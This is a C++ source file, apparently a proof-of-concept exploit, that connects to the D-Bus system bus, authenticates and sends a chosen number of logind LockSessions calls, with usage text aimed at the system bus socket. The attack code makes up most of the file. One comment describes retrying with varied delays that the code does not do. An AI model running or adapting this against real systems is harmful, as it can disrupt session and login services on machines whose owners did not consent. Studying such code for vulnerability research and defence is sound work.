#include "dbus_utils.hpp"
#include "dbus_auth.hpp"
#include "utils.hpp"
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>
#include <cerrno>
#include <cstring>
#include <exception>

// A UNIX-domain stream socket connected to a D-Bus daemon.
//
// The constructor creates the socket, connects it to the given path,
// runs `dbus_sendauth`, sends the Hello message and reads two replies,
// so a successfully constructed object is ready for method calls.
// The file descriptor is held by the `AutoCloseFD` base and is reachable
// through `get()`.
class DBusSocket : public AutoCloseFD {
public:
  // Connects to the UNIX socket at `filename` and performs the D-Bus
  // authentication / Hello exchange on behalf of `uid`.
  //
  // Throws ErrorWithErrno if the socket cannot be created, if `filename`
  // does not fit in `sockaddr_un::sun_path`, or if `connect` fails.
  // NOTE(review): the dbus_* helpers and receive_dbus_message are declared
  // elsewhere and may throw as well -- confirm against their headers.
  DBusSocket(const uid_t uid, const char* filename) :
    AutoCloseFD(socket(AF_UNIX, SOCK_STREAM, 0))
  {
    if (get() < 0) {
      throw ErrorWithErrno("Could not create socket");
    }

    sockaddr_un address;
    memset(&address, 0, sizeof(address));
    address.sun_family = AF_UNIX;

    // `sun_path` is a small fixed-size array and `filename` comes straight
    // from the command line, so reject paths that would not fit (including
    // the terminating NUL) instead of overflowing the stack buffer.
    const size_t filename_len = strlen(filename);
    if (filename_len >= sizeof(address.sun_path)) {
      // Assumes ErrorWithErrno picks up the current errno value, as the
      // other throw sites in this constructor rely on -- TODO confirm.
      errno = ENAMETOOLONG;
      throw ErrorWithErrno("Socket path is too long");
    }
    memcpy(address.sun_path, filename, filename_len + 1);

    if (connect(get(), reinterpret_cast<sockaddr*>(&address), sizeof(address)) < 0) {
      throw ErrorWithErrno("Could not connect socket");
    }

    dbus_sendauth(uid, get());

    // Two messages are read back after Hello. The first element of the
    // first reply's body is extracted as a string; it is not used further
    // here. NOTE(review): presumably this is the unique connection name
    // assigned by the bus, and the extraction doubles as a sanity check on
    // the reply's shape -- confirm before removing it.
    dbus_send_hello(get());
    std::unique_ptr<DBusMessage> hello_reply1 = receive_dbus_message(get());
    const std::string name = hello_reply1->getBody().getElement(0)->toString().getValue();
    std::unique_ptr<DBusMessage> hello_reply2 = receive_dbus_message(get());
  }
};

// Issues a single `LockSessions` method call on the connection `fd` by
// forwarding to `dbus_method_call`, tagging the message with
// `serialNumber` and using the body produced by `DBusMessageBody::mk0()`.
//
// NOTE(review): the four string arguments look like, in order, the object
// path, the interface, the destination bus name and the member name of
// logind's Manager object -- confirm against the declaration of
// `dbus_method_call`, which is not visible in this file.
static void send_logind_LockSessions(const int fd, const uint32_t serialNumber) {
  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk0(),  // presumably an empty (zero-argument) body -- confirm
    _s("/org/freedesktop/login1"),
    _s("org.freedesktop.login1.Manager"),
    _s("org.freedesktop.login1"),
    _s("LockSessions")
  );
}

// Keep trying `attempt_LockSessions_with_disconnect` with different
// delay values until the exploit succeeds (or we decide to give up).
static void exploit_LockSessions(
  const uid_t uid,
  const char* filename,
  const long n
) {
  DBusSocket fd(uid, filename);

  for (long i = 0; i < n; i++) {
    send_logind_LockSessions(fd.get(), i+1);
  }
}

// Writes the command-line synopsis and an example invocation to stderr.
// `progname` is substituted as the program name on both lines.
static void usage(const char* progname) {
  static const char kUsageFormat[] =
    "usage:   %s <unix socket path> <number of messages to send>\n"
    "example: %s /var/run/dbus/system_bus_socket 4096\n";

  fprintf(stderr, kUsageFormat, progname, progname);
}

// Program entry point.
//
// Expects exactly two arguments: the path of the D-Bus UNIX socket and the
// number of messages to send. The count is parsed with base auto-detection
// (decimal, 0x-prefixed hex or 0-prefixed octal) and must be a complete,
// in-range, non-negative integer. Any argument error prints the usage
// text and returns EXIT_FAILURE; otherwise the messages are sent and
// EXIT_SUCCESS is returned.
int main(int argc, char* argv[]) {
  const char* progname = argc > 0 ? argv[0] : "a.out";
  if (argc != 3) {
    usage(progname);
    return EXIT_FAILURE;
  }

  // strtol reports overflow only through errno (it returns a clamped
  // value), so errno has to be cleared before the call and checked after.
  char* endptr = nullptr;
  errno = 0;
  const long n = strtol(argv[2], &endptr, 0);
  const bool parsed_whole_arg = endptr != argv[2] && *endptr == '\0';
  if (!parsed_whole_arg || errno == ERANGE || n < 0) {
    usage(progname);
    return EXIT_FAILURE;
  }

  const uid_t uid = getuid();
  const char* filename = argv[1];

  // Connection problems are reported by exception; print them rather than
  // letting them escape main and abort the process via std::terminate.
  // NOTE(review): this only catches types derived from std::exception;
  // whether ErrorWithErrno is one of them is not visible here -- anything
  // else still propagates exactly as before.
  try {
    exploit_LockSessions(uid, filename, n);
  } catch (const std::exception& e) {
    fprintf(stderr, "%s: %s\n", progname, e.what());
    return EXIT_FAILURE;
  }

  return EXIT_SUCCESS;
}
